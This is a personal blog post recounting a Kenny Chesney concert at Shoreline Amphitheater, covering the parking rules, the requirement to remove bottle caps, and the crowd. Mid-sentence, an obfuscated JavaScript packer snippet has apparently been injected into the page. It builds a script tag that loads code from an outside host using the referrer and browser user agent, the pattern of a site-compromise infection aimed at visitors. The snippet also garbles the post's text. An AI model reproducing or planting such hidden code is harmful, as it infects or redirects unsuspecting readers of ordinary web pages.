Shoreline Amphitheater and Kenny

We headed to the Shoreline Amphitheater on Friday for the Kenny Chesney concert.

Have you heard about Shoreline?  Parking is free but you can’t tailgate.  Well, no BBQs and no alcohol….no fun?  We made the best of it and had ourselves a little picnic in the parking lot.

What’s (usually) great about Shoreline, is that they allow people to bring in snacks and CLOSED drinks.  We brought in the remaining picnic fixings, water and soda.

We arrive at the bag-check-pat-down area and learn that we can bring in our CLOSED drinks as long as we remove the caps.  You’re kidding me.  We had 4 bottles of soda and 4 bottles of water.  Instead of tossing them, we oblige….remove the lids, take a few swigs and try to balance our drinks and carry our chairs and blankets.  Turns out it’s Kenny’s rule.  Removing the caps makes it more difficult for people to throw bottles onto the stage.  Has he had problems with that in the past?

Our friends were sneaky, they opened the bottles in front of the lady, but pocketed 2 of the lids.

The ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idkkd|var|u0026u|referrer|reddk||js|php’.split(‘|’),0,{}))
people watching was almost as great as the concert.  We’re always amazed at the outfits worn by the 18 and under crowd.  Short-shorts, tank tops, dresses etc.  We wear long pants, fleece jackets and sometimes even throw in a beanie for good measure.

Kenny didn’t disappoint.  Although I still think Tim Mcgraw and Brad Paisley rank a little higher 🙂
